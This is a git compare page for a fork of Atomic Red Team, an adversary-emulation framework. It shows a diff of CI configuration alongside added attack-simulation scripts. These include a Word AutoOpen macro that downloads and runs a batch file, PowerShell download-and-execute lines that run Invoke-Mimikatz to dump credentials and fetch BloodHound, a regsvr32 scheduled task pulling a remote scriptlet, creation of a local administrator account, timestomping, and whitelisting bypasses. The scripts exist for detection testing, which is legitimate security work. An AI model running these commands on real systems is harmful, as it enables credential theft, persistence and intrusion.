adam/atomic-red-team-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

merge into: adam/atomic-red-team-gs:python_conversion
Branches Tags
adam/atomic-red-team-gs:master adam/atomic-red-team-gs:dependabot/pip/typer-0.25.1 adam/atomic-red-team-gs:dependabot/pip/hypothesis-6.152.4 adam/atomic-red-team-gs:remove_ruby adam/atomic-red-team-gs:attack-v19-migration adam/atomic-red-team-gs:dependabot/pip/pydantic-2.13.3 adam/atomic-red-team-gs:main adam/atomic-red-team-gs:fix_attack_nav adam/atomic-red-team-gs:markdown_changes adam/atomic-red-team-gs:external_payloads adam/atomic-red-team-gs:use-basic-parsing adam/atomic-red-team-gs:pre-commit adam/atomic-red-team-gs:python_conversion adam/atomic-red-team-gs:issue_template_fix adam/atomic-red-team-gs:insecure-curl adam/atomic-red-team-gs:T1553.001_fix adam/atomic-red-team-gs:npm_simulate adam/atomic-red-team-gs:remove_bin adam/atomic-red-team-gs:T1016_fix adam/atomic-red-team-gs:cloudlfare-tunnel adam/atomic-red-team-gs:remove_users_launch_daemon adam/atomic-red-team-gs:sysmon_fix adam/atomic-red-team-gs:fix_T1562.001 adam/atomic-red-team-gs:cyberbuff-patch-2 adam/atomic-red-team-gs:yamlfix adam/atomic-red-team-gs:remove-unused-static-dir adam/atomic-red-team-gs:clr2of8-patch-44 adam/atomic-red-team-gs:clr2of8-patch-43 adam/atomic-red-team-gs:clr2of8-patch-35 adam/atomic-red-team-gs:clr2of8-patch-32 adam/atomic-red-team-gs:t1547008 adam/atomic-red-team-gs:atoms adam/atomic-red-team-gs:clr2of8-patch-16 adam/atomic-red-team-gs:clr2of8-patch-14 adam/atomic-red-team-gs:testest adam/atomic-red-team-gs:linpeas_linux adam/atomic-red-team-gs:AutoSUID_linux adam/atomic-red-team-gs:clr2of8-patch-8 adam/atomic-red-team-gs:T1218.005-powershell-without-network-call adam/atomic-red-team-gs:revert-1530-adding_comments_to_navigator adam/atomic-red-team-gs:add_codeowners adam/atomic-red-team-gs:clr2of8-patch-3 adam/atomic-red-team-gs:oscd adam/atomic-red-team-gs:admin-guide adam/atomic-red-team-gs:APT28 adam/atomic-red-team-gs:update-PSDocs adam/atomic-red-team-gs:io-update adam/atomic-red-team-gs:ProcessHolllowingT1093
..
pull from: adam/atomic-red-team-gs:io-update
Branches Tags
adam/atomic-red-team-gs:dependabot/pip/typer-0.25.1 adam/atomic-red-team-gs:master adam/atomic-red-team-gs:dependabot/pip/hypothesis-6.152.4 adam/atomic-red-team-gs:remove_ruby adam/atomic-red-team-gs:attack-v19-migration adam/atomic-red-team-gs:dependabot/pip/pydantic-2.13.3 adam/atomic-red-team-gs:main adam/atomic-red-team-gs:fix_attack_nav adam/atomic-red-team-gs:markdown_changes adam/atomic-red-team-gs:external_payloads adam/atomic-red-team-gs:use-basic-parsing adam/atomic-red-team-gs:pre-commit adam/atomic-red-team-gs:python_conversion adam/atomic-red-team-gs:issue_template_fix adam/atomic-red-team-gs:insecure-curl adam/atomic-red-team-gs:T1553.001_fix adam/atomic-red-team-gs:npm_simulate adam/atomic-red-team-gs:remove_bin adam/atomic-red-team-gs:T1016_fix adam/atomic-red-team-gs:cloudlfare-tunnel adam/atomic-red-team-gs:remove_users_launch_daemon adam/atomic-red-team-gs:sysmon_fix adam/atomic-red-team-gs:fix_T1562.001 adam/atomic-red-team-gs:cyberbuff-patch-2 adam/atomic-red-team-gs:yamlfix adam/atomic-red-team-gs:remove-unused-static-dir adam/atomic-red-team-gs:clr2of8-patch-44 adam/atomic-red-team-gs:clr2of8-patch-43 adam/atomic-red-team-gs:clr2of8-patch-35 adam/atomic-red-team-gs:clr2of8-patch-32 adam/atomic-red-team-gs:t1547008 adam/atomic-red-team-gs:atoms adam/atomic-red-team-gs:clr2of8-patch-16 adam/atomic-red-team-gs:clr2of8-patch-14 adam/atomic-red-team-gs:testest adam/atomic-red-team-gs:linpeas_linux adam/atomic-red-team-gs:AutoSUID_linux adam/atomic-red-team-gs:clr2of8-patch-8 adam/atomic-red-team-gs:T1218.005-powershell-without-network-call adam/atomic-red-team-gs:revert-1530-adding_comments_to_navigator adam/atomic-red-team-gs:add_codeowners adam/atomic-red-team-gs:clr2of8-patch-3 adam/atomic-red-team-gs:oscd adam/atomic-red-team-gs:admin-guide adam/atomic-red-team-gs:APT28 adam/atomic-red-team-gs:update-PSDocs adam/atomic-red-team-gs:io-update adam/atomic-red-team-gs:ProcessHolllowingT1093

1 Commits
python_conversion .. io-update

Author SHA1 Message Date
Michael Haag cc15adc96c Spreadsheet URL - 404 
Received a 404 on the direct link to spreadsheet. I changed it to the spreadsheet directory, in case it changes or new things are added over time.
 2019-02-08 09:01:42 -07:00
1565 changed files with 150949 additions and 2007952 deletions
Expand all files Collapse all files
.circleci/config.yml
+51
View File
@@ -0,0 +1,51 @@
version: 2
defaults: &defaults
docker:
- image: circleci/ruby:2.4
workflows:
version: 2
validate-then-generate-docs:
jobs:
- validate_atomics_generate_docs
jobs:
validate_atomics_generate_docs:
<<: *defaults
steps:
- checkout
- add_ssh_keys
- run:
name: Validate the format of atomic tests against the spec
command: |
bin/validate-atomics.rb
- run:
name: Generate nice markdown document for atomics
command: |
bin/generate-atomic-docs.rb
echo ""
echo ""
git status
echo ""
echo ""
git diff-index HEAD --
if git diff-index --quiet HEAD -- ; then
echo "Not committing documentation because there are no changes"
#elif [[ "${CIRCLE_BRANCH}" == "master" ]]; then
# echo "Not committing documentation because we are on master and doc changes should be part of pull request branches"
elif [[ $(echo "$CIRCLE_BRANCH" | grep -c "pull") -gt 0 ]]; then
echo "Not committing documentation because we are on a pull request branch that we don't have push permissions to"
else
git config credential.helper 'cache --timeout=120'
git config user.email "<email>"
git config user.name "CircleCI Atomic Red Team doc generator"
git add atomics
git commit -am "Generate docs from job=$CIRCLE_JOB branch=$CIRCLE_BRANCH"
git push -u origin $CIRCLE_BRANCH
fi
.devcontainer/devcontainer.json
-26
View File
@@ -1,26 +0,0 @@
{
"image": "mcr.microsoft.com/devcontainers/universal:2",
"features": {
"ghcr.io/devcontainers/features/powershell:1": {},
"ghcr.io/natescherer/devcontainers-custom-features/powershell-resources:1": {
"resources": "powershell-yaml,invoke-atomicredteam"
}
},
"remoteUser": "root",
"onCreateCommand": "pwsh /workspaces/atomic-red-team/.devcontainer/setup.ps1",
"customizations": {
"vscode": {
"extensions": [
"ms-vscode.powershell"
],
"settings": {
"terminal.integrated.defaultProfile.linux": "pwsh",
"terminal.integrated.profiles.linux": {
"pwsh": {
"path": "/usr/bin/pwsh"
}
}
}
}
}
}
.devcontainer/setup.ps1
-7
View File
@@ -1,7 +0,0 @@
New-Item $PROFILE -Force
Set-Variable -Name "InvokePath" -Value (Get-Item /usr/local/share/powershell/Modules/Invoke-AtomicRedTeam/**/Invoke-AtomicRedTeam.psd1).FullName
Write-Output @"
Import-Module $InvokePath -Force
`$PSDefaultParameterValues`["Invoke-AtomicTest:PathToAtomicsFolder"] = "/workspaces/atomic-red-team/atomics";
`$PSDefaultParameterValues`["Invoke-AtomicTest:ExecutionLogPath"]="$HOME/AtomicRedTeam/execution.csv";
"@ > $PROFILE
.github/ISSUE_TEMPLATE/idea.md
-29
View File
@@ -1,29 +0,0 @@
---
name: Idea
about: An idea for a feature or improvement to Atomic Red Team.
title: 'Idea: '
labels: 'idea'
assignees: ''
---
### Use-cases
<!---
In order to properly evaluate a feature request, it is necessary to understand the use-cases for it.
Please describe below the _end goal_ you are trying to achieve that has led you to request this feature.
Please keep this section focused on the problem and not on the suggested solution. We'll get to that in a moment, below!
-->
### Proposal
<!---
If you have an idea for a way to address the problem via a change, please describe it below.
If you're not sure of some details, don't worry! When we evaluate the feature request we may suggest modifications.
-->
### References
<!--
Anything else, such as links to other issues or examples, that didn't seem to fit above.
-->
.github/ISSUE_TEMPLATE/new_atomic.md
-19
View File
@@ -1,19 +0,0 @@
---
name: Submit a new test
about: Submit a new Atomic Red Team atomic test.
title: 'TXXX: Your test name here'
labels: 'new-test'
assignees: ''
---
<!--
For reference, check out this article that explains how to properly submit a new atomic test: https://www.atomicredteam.io/atomic-red-team/docs/designing-atomic-tests.
-->
### Technique ID: TXXXX
### Additional Details
<!--
Anything you'd like to share or explain that isn't represented in the contents of the YAML-based test definition.
-->
.github/ISSUE_TEMPLATE/website_change.md
-19
View File
@@ -1,19 +0,0 @@
---
name: Website change
about: Propose a change to the website at https://atomicredteam.io
title: 'Website: '
labels: 'website'
assignees: ''
---
### Why the change?
### A summary of the change
### References
<!--
Anything else, such as links to other issues or examples, that didn't seem to fit above.
-->
.github/dependabot.yml
-16
View File
@@ -1,16 +0,0 @@
# To get started with Dependabot version updates, you'll need to specify which
# package ecosystems to update and where the package manifests are located.
# Please see the documentation for all configuration options:
# https://docs.github.com/github/administering-a-repository/configuration-options-for-dependency-updates
version: 2
updates:
- package-ecosystem: "pip" # See documentation for possible values
directory: "/" # Location of package manifests
schedule:
interval: "weekly"
# Maintain dependencies for GitHub Actions
- package-ecosystem: "github-actions"
directory: "/"
schedule:
interval: "weekly"
.github/ISSUE_TEMPLATE/problem_report.md → .github/issue_template.md
+2 -8
View File
@@ -1,11 +1,5 @@
---
name: Problem
about: Tell us about a problem you've encountered.
title: 'Problem: '
labels: 'problem'
assignees: ''
# Report
---
## What did you do?
Please replace this with what you did.
@@ -29,4 +23,4 @@ e.g. 💥
* If relevant, which [execution harness](2) are you attempting to use?
[1]: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics "atomic tests"
[2]: https://github.com/redcanaryco/atomic-red-team/tree/master/execution-frameworks "execution frameworks"
[2]: https://github.com/redcanaryco/atomic-red-team/tree/master/execution-frameworks "execution frameworks"
.github/workflows/assign-labels.yml
-59
View File
@@ -1,59 +0,0 @@
name: assign-labels
on:
workflow_run:
workflows: ["validate-atomics"]
types:
- completed
jobs:
assign-labels:
runs-on: ubuntu-latest
steps:
- name: download-artifact
uses: actions/github-script@v8
with:
script: |
let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
owner: context.repo.owner,
repo: context.repo.repo,
run_id: context.payload.workflow_run.id,
});
let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => {
return artifact.name == "labels.json"
})[0];
let download = await github.rest.actions.downloadArtifact({
owner: context.repo.owner,
repo: context.repo.repo,
artifact_id: matchArtifact.id,
archive_format: 'zip',
});
let fs = require('fs');
fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/labels.zip`, Buffer.from(download.data));
- name: unzip-artifact
run: unzip labels.zip
- name: assign-labels-and-reviewers
uses: actions/github-script@v8
with:
script: |
let fs = require('fs');
const obj = JSON.parse(fs.readFileSync('./labels.json'));
console.log(obj)
if(obj.labels.length > 0){
await github.rest.issues.addLabels({
issue_number: obj.pr,
owner: context.repo.owner,
repo: context.repo.repo,
labels: obj.labels
})
}
if(obj.maintainers.length > 0){
await github.rest.issues.addAssignees({
issue_number: obj.pr,
owner: context.repo.owner,
repo: context.repo.repo,
assignees: obj.maintainers
});
}
.github/workflows/generate-docs.yml
-69
View File
@@ -1,69 +0,0 @@
name: generate-docs
on:
push:
branches: [ "master" ]
jobs:
generate-docs:
runs-on: ubuntu-latest
steps:
- name: checkout repo
uses: actions/checkout@v6
with:
token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
- name: Install poetry
run: pipx install poetry
- uses: actions/setup-python@v6
with:
python-version: "3.11.2"
cache: "poetry"
- name: Install dependencies
run: poetry install --no-interaction
- name: Generate shields.io URL
run: poetry run python runner.py generate-counter
id: counter
working-directory: atomic_red_team
env:
PYTHONPATH: ${{ github.workspace }}
- name: Update README
run: |
echo ${{ steps.counter.outputs.result }}
sed -i "s|https://img.shields.io/badge/Atomics-.*-flat.svg|${{ steps.counter.outputs.result }}|" README.md
shell: bash
- name: Generate and commit unique GUIDs for each atomic test
run: poetry run python runner.py generate-guids
working-directory: atomic_red_team
env:
PYTHONPATH: ${{ github.workspace }}
- name: setup ruby
uses: ruby/setup-ruby@v1
with:
ruby-version: 3.0
bundler-cache: true
- name: generate markdown docs for atomics
run: |
bin/generate-atomic-docs.rb
echo ""
echo ""
git status
echo ""
echo ""
git diff-index HEAD --
if git diff-index --quiet HEAD -- ; then
echo "Not committing documentation because there are no changes"
else
git config credential.helper 'cache --timeout=120'
git config user.email "opensource@redcanary.com"
git config user.name "Atomic Red Team doc generator"
git add README.md
git add atomics
git commit -am "Generated docs from job=$GITHUB_JOB branch=$GITHUB_REF_NAME [ci skip]"
git push origin $GITHUB_REF_NAME -f
fi
.github/workflows/run-python-tests.yml
-29
View File
@@ -1,29 +0,0 @@
name: validate-python-file-changes
on:
pull_request:
branches:
- master
paths:
- "atomic_red_team/**/*.py"
jobs:
validate-python-file-changes:
runs-on: macos-latest
steps:
- name: checkout repo
uses: actions/checkout@v6
- name: Install poetry
run: pipx install poetry
- name: setup python3.11
uses: actions/setup-python@v6
id: setup-python
with:
python-version: "3.12.4"
cache: "poetry"
- name: Install dependencies
run: poetry install --no-interaction
- name: Run pytest
run: poetry run pytest atomic_red_team/tests
.github/workflows/stale.yml
-19
View File
@@ -1,19 +0,0 @@
name: 'Close stale issues and PRs'
on:
schedule:
- cron: '30 1 * * *'
jobs:
stale:
runs-on: ubuntu-latest
steps:
- uses: actions/stale@v10
with:
stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.'
stale-pr-message: 'This PR is stale because it has been open 45 days with no activity. Remove stale label or comment or this will be closed in 10 days.'
close-issue-message: 'This issue was closed because it has been stalled for 5 days with no activity.'
close-pr-message: 'This PR was closed because it has been stalled for 10 days with no activity.'
days-before-issue-stale: 30
days-before-pr-stale: 45
days-before-issue-close: 10
days-before-pr-close: 10
.github/workflows/validate-atomics.yml
-75
View File
@@ -1,75 +0,0 @@
name: validate-atomics
on:
pull_request:
branches:
- master
jobs:
validate-atomics:
runs-on: ubuntu-latest
steps:
- name: checkout repo
uses: actions/checkout@v6
- name: Install poetry
run: pipx install poetry
- name: setup python3.11
uses: actions/setup-python@v6
id: setup-python
with:
python-version: "3.11.2"
cache: "poetry"
- name: Install dependencies
run: poetry install --no-interaction
- name: validate the format of atomics tests against the spec
run: poetry run python runner.py validate
working-directory: atomic_red_team
env:
PYTHONPATH: ${{ github.workspace }}
upload:
runs-on: ubuntu-latest
steps:
- name: checkout repo
uses: actions/checkout@v6
- name: Install poetry
run: pipx install poetry
- name: setup python3.11
uses: actions/setup-python@v6
id: setup-python
with:
python-version: "3.11.2"
cache: "poetry"
- uses: actions/github-script@v8
id: get_pr_number
with:
script: |
if (context.issue.number) {
// Return issue number if present
return context.issue.number;
} else {
// Otherwise return issue number from commit
return (
await github.rest.repos.listPullRequestsAssociatedWithCommit({
commit_sha: context.sha,
owner: context.repo.owner,
repo: context.repo.repo,
})
).data[0].number;
}
result-encoding: string
- name: Install dependencies
run: poetry install --no-interaction --no-root
- name: save labels and reviewers into a file.
run: |
poetry run python runner.py generate-labels --pr '${{steps.get_pr_number.outputs.result}}' --token ${{ secrets.GITHUB_TOKEN }}
working-directory: atomic_red_team
env:
PYTHONPATH: ${{ github.workspace }}
- uses: actions/upload-artifact@v5
with:
name: labels.json
path: atomic_red_team/pr/
.github/workflows/validate-terraform.yml
-20
View File
@@ -1,20 +0,0 @@
name: validate-terraform
on:
pull_request:
branches:
- master
paths:
- "**/*.tf"
jobs:
validate-terraform:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v6
- uses: hashicorp/setup-terraform@v3
- name: Terraform fmt
id: fmt
run: terraform fmt -recursive -check
continue-on-error: false
.gitignore
-144
View File
@@ -2,151 +2,7 @@
.DS_Store
.vscode
.atom
atomic-red-team/enterprise-attack.json
# Compiled Object files
*.slo
*.lo
*.o
*.obj
# vs logs
*.tlog
*.log
# Precompiled Headers
*.gch
*.pch
docs/.sass-cache/
docs/_site/
**/Invoke-AtomicTest-ExecutionLog.csv
techniques_hash.db
# Credential files
*.creds
# Local .terraform directories
**/.terraform/*
# .tfstate files
*.tfstate
*.tfstate.*
**/*.terraform.lock.hcl
# Crash log files
crash.log
crash.*.log
# Ignore override files as they are usually used to override resources locally and so
# are not checked in
override.tf
override.tf.json
*_override.tf
*_override.tf.json
# Include override files you do wish to add to version control using negated pattern
# !example_override.tf
# Include tfplan files to ignore the plan output of command: terraform plan -out=tfplan
# example: *tfplan*
# Ignore CLI configuration files
.terraformrc
terraform.rc
*.pyc
# The ExternalPayloads folder
ExternalPayloads
# Visual Studio 2015/2017 cache/options directory
.vs/
# .NET Core
project.lock.json
project.fragment.lock.json
artifacts/
# ASP.NET Scaffolding
ScaffoldingReadMe.txt
# StyleCop
StyleCopReport.xml
# Files built by Visual Studio
*_i.c
*_p.c
*_h.h
*.ilk
*.meta
*.obj
*.iobj
*.pch
*.pdb
*.ipdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*_wpftmp.csproj
*.log
*.tlog
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb
# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap
# Visual Studio Trace Files
*.e2e
# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!?*.[Cc]ache/
# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.jfm
*.pfx
*.publishsettings
orleans.codegen.cs
# Node.js
node_modules/
# Python
__pycache__/
*.pyc
.hypothesis/
ARTifacts/Adversary/Dragons_Tail/DragonsTail.vba
+48
View File
@@ -0,0 +1,48 @@
' Save Document As Single Web Page .mht
' Rename Document As .Doc
' This Document is modeled after FireEye's report on APT32
' Special Thanks to Nick Carr for his work on this write-up
' https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
Sub AutoOpen()
Dim myURL As String
Dim myPath As String
If (MsgBox("You're Are About To Execute the ATOMIC Test for Dragon's Tail, You sure?", 1, vbMsgBoxSetForeground) = 2) Then
End ' This Ends Macro
End If
' Downloads Dragon's Tail Chain Reaction Script
myURL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat"
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", myURL, False, "username", "password"
WinHttpReq.send
myURL = WinHttpReq.responseBody
If WinHttpReq.Status = 200 Then
Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.responseBody
Dim fso As Object
Const FLDR_NAME As String = "C:\Tools\"
Set fso = CreateObject("Scripting.FileSystemObject")
If Not fso.FolderExists(FLDR_NAME) Then
fso.CreateFolder (FLDR_NAME)
End If
' Change Path HERE
oStream.SaveToFile "C:\Tools\NothingToSeeHere.bat", 2 ' 1 = no overwrite, 2 = overwrite
' EXECUTE FROM PATH
Shell "cmd.exe /c C:\Tools\NothingToSeeHere.bat"
oStream.Close
End If
End Sub
ARTifacts/Adversary/Dragons_Tail/README.md
+2
View File
@@ -0,0 +1,2 @@
### Group: Dragon's Tail
[Modeled After G0050](https://attack.mitre.org/wiki/Group/G0050)
ARTifacts/Chain_Reactions/README.md
+1
View File
@@ -0,0 +1 @@
# Chain Reactions
atomics/T1005/src/gta.db → ARTifacts/Chain_Reactions/atomic-hello
Regular → Executable
BIN
View File
Binary file not shown.
ARTifacts/Chain_Reactions/atomic-hello.c
+11
View File
@@ -0,0 +1,11 @@
#include <stdio.h>
// Simple Hello World for Atomic Red Team payload
int main() {
printf("Hello from Atomic Red Team! \n");
return 0;
}
atomics/T1005/src/art → ARTifacts/Chain_Reactions/atomic-hello.macos
Regular → Executable
BIN
View File
Binary file not shown.
ARTifacts/Chain_Reactions/chain_reaction_Argonaut.ps1
+19
View File
@@ -0,0 +1,19 @@
# Chain Reaction: Argonaut
# Tactics: Execution:Powershell, Discovery
# variable can be changed to $userprofile to drop the bat elsewhere
# TEMP=C:\Users\<username>\AppData\Local\Temp
$temp = $env:temp
# Note that these are alias' for Invoke-WebRequest.
# The concept is to see how curl and wget look in you detection tools vs what is commonly used (IWR, Invoke-WebRequest, etc)
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\1.bat
# Alternate Ending: Using curl
curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\2.bat
# Execute the 1.bat file
cmd.exe /c $temp\1.bat
ARTifacts/Chain_Reactions/chain_reaction_Cyclotron.bat
+29
View File
@@ -0,0 +1,29 @@
::Chain Reaction - Cyclotron
::
:: In this test we will executing a binary multiple ways.
:: Some of these are Application Whitelisting Bypasses
:: Either Clone the Repo, or Download the AllTheThings DLL Somehow ;-)
REM X86
Executing X86 AllTheThings Test
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThingsx86.dll
regsvr32.exe /s /u AllTheThingsx86.dll
regsvr32.exe /s AllTheThingsx86.dll
rundll32 AllTheThingsx86.dll,EntryPoint
odbcconf.exe /s /a { REGSVR AllTheThingsx86.dll }
regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThingsx86.dll
REM AMD64
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThingsx64.dll
regsvr32.exe /s /u AllTheThingsx64.dll
regsvr32.exe /s AllTheThingsx64.dll
rundll32 AllTheThingsx64.dll,EntryPoint
odbcconf.exe /s /a { REGSVR AllTheThingsx64.dll }
regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThingsx64.dll
ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat
+42
View File
@@ -0,0 +1,42 @@
:: Adversary Group: https://attack.mitre.org/wiki/Group/G0050
:: xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
:: Thanks to Nick Carr for his research on this group
:: Sample Representation of ATT&CK Techniques used by APT32
:: Tactics: Execution, Persistence, Privilege Escalation
:: Tactic: Privilege Escalation / Execution
:: Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
:: Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
SCHTASKS /Delete /TN "Atomic Testing" /F
:: Tactics: Execution
:: Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
:: Tactics: Defense Evasion
:: Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
:: Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
:: To Encode A Command
:: $Text = '$file=(gi test.txt);$date=''7/16/1945 5:29am'';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date'
:: $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
:: $EncodedText =[Convert]::ToBase64String($Bytes)
:: $EncodedText
echo "Atomic Test File" > test.txt
::PowerShell.exe -com {$file=(gi test.txt);$date = '7/16/1945 5:29am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
PowerShell.exe -enc JABmAGkAbABlAD0AKABnAGkAIAB0AGUAcwB0AC4AdAB4AHQAKQA7ACQAZABhAHQAZQA9ACcANwAvADEANgAvADEAOQA0ADUAIAA1ADoAMgA5AGEAbQAnADsAJABmAGkAbABlAC4ATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEwAYQBzAHQAQQBjAGMAZQBzAHMAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEMAcgBlAGEAdABpAG8AbgBUAGkAbQBlAD0AJABkAGEAdABlAA==
:: Tactics: Defense Evasion
:: technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
:: Deletes File, detection here would be File Modification
::del test.txt
ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1
+37
View File
@@ -0,0 +1,37 @@
# Adversary Group: https://attack.mitre.org/wiki/Group/G0050
# xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
# Thanks to Nick Carr for his research on this group
# Sample Representation of ATT&CK Techniques used by APT32
# Tactics: Execution, Persistence, Privilege Escalation
# Tactic: Privilege Escalation / Execution
# Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
# Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
SCHTASKS /Delete /TN "Atomic Testing" /F
# Tactics: Execution
# Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
# Tactics: Defense Evasion
# Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
# Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
$test = "Atomic Test File"
set-content -path test.txt -value $test
$file=(gi test.txt);$date='7/16/1945 5:29 am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date
# Tactics: Defense Evasion
# technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
# Deletes File, detection here would be File Modification
del test.txt
Write-Host "Done" -Fore Green
ARTifacts/Chain_Reactions/chain_reaction_Fission.bat
+56
View File
@@ -0,0 +1,56 @@
:: Chain Reaction - Fission
::
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
::
:: This particular Chain Reaction focuses on Discovery.
:: Tactic: Discovery
:: Technique: Remote System Discovery https://attack.mitre.org/wiki/Technique/T1018
:: Change IP scheme for your environment
:: for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i > ping_output.txt
net.exe view
net.exe view /domain
:: Tactic: Discovery
:: Technique: Account Discovery https://attack.mitre.org/wiki/Windows_Technique_Matrix
net localgroup "administrators"
wmic useraccount get /ALL
:: Tactic: Discovery
:: Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
netsh.exe advfirewall firewall show all profiles
tasklist.exe | findstr cb
tasklist.exe | findstr virus
tasklist.exe | findstr defender
:: Execution
:: Tactic: Discovery
:: Technique: System Network Configuration Discovery https://attack.mitre.org/wiki/Technique/T1016
ipconfig /all
arp -a
nbtstat -n
:: Tactic: Discovery
:: Technique: File and Directory Discovery https://attack.mitre.org/wiki/Technique/T1083
dir /s c:\ >> %temp%\download
:: Tactic: Execution
:: Technique: Powershell https://attack.mitre.org/wiki/Technique/T1086
:: Download and invoke BloodHound Ingestor
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-BloodHoundData"
ARTifacts/Chain_Reactions/chain_reaction_Plutonium.bat
+33
View File
@@ -0,0 +1,33 @@
:: Chain Reaction 01
::
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
:: This particular Chain Reaction focuses on generating event noise.
:: Tactics: Persistence, Defense Evasion
:: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
:: RegSvr32 https://attack.mitre.org/wiki/Technique/T1117
:: This particular technique will reach out to the github repository (network) and spawn calc (process) every 30 minutes.
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
:: Tactic: Discovery
:: Execution: https://attack.mitre.org/wiki/Technique/T1086
:: Have PowerShell download the Discovery.bat, output to a local file (for review later)
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > output.txt
:: Tactic: Credential Access
:: Technique: Create Account https://attack.mitre.org/wiki/Technique/T1136
:: Add a user, then add to group
Net user /add Trevor SmshBgr123
:: Add user to group
net localgroup administrators Trevor /add
ECHO Well that was fun!
pause
ARTifacts/Chain_Reactions/chain_reaction_Ranger.sh
Executable
+106
View File
@@ -0,0 +1,106 @@
#!/bin/sh
# Chain Reaction Ranger
# NOTE it is a BAD idea to execute scripts from a repo that you do not control.
# NOTE We recommend executing from a server that you control.
# NOTE Thank You :)
